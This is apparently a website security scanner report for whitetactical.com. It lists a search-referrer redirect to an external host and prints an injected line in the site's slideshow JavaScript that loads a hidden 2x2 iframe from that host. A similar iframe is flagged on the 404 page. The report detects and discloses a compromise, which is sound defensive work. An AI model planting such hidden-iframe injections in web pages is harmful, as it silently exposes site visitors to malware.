Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://whitetactical.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: whitetactical.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Dec 2014 08:51:04 GMT Location: http://from-ai-dai-lane.bplaced.net/aawf.html?h=783978 Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://from-ai-dai-lane.bplaced.net/aawf.html?h=783978 (imitation of visitor from search engine) GET /aawf.html?h=783978 HTTP/1.1 Host: from-ai-dai-lane.bplaced.net Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Dec 2014 08:51:05 GMT Location: http://www.bplaced.net/404 Server: Apache/2.4 Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://whitetactical.com/ | 200 OK Content-Length: 5597 Content-Type: text/html | clean |
http://whitetactical.com/services.html | 200 OK Content-Length: 4298 Content-Type: text/html | clean |
http://whitetactical.com/pictures.html | 200 OK Content-Length: 7589 Content-Type: text/html | clean |
http://whitetactical.com/js/image-slideshow.js | 200 OK Content-Length: 4237 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=783978></iframe>');
var displayWaitMessage=true; var activeImage = false; var imageGalleryLeftPos = false; var imageGalleryWidth = false; var imageGalleryObj = false; var maxGalleryXPos = false; var slideSpeed = 0; var imageGalleryCaptions = new Array(); fun img.onload = function() { hideWaitMessageAndShowCaption(imageIndex-1); }; img.src = imagePath; } function hideWaitMessageAndShowCaption(imageIndex) { document.getElementById('waitMessage').style.display='none'; document.getElementById('largeImageCaption').innerHTML = imageGalleryCaptions[imageIndex]; document.getElementById('largeImageCaption').style.display='block'; } window.onload = initSlideShow;
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=783978 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=783978>
http://whitetactical.com/pricing.html | 200 OK Content-Length: 5623 Content-Type: text/html | clean |
http://whitetactical.com/shipping.html | 200 OK Content-Length: 4534 Content-Type: text/html | clean |
http://whitetactical.com/contact.html | 200 OK Content-Length: 1979 Content-Type: text/html | clean |
http://whitetactical.com/test404page.js | 404 Not Found Content-Length: 1814 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?i=783978 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?i=783978> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whitetactical.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://whitetactical.com/
Result: whitetactical.com is not infected or malware details are not published yet.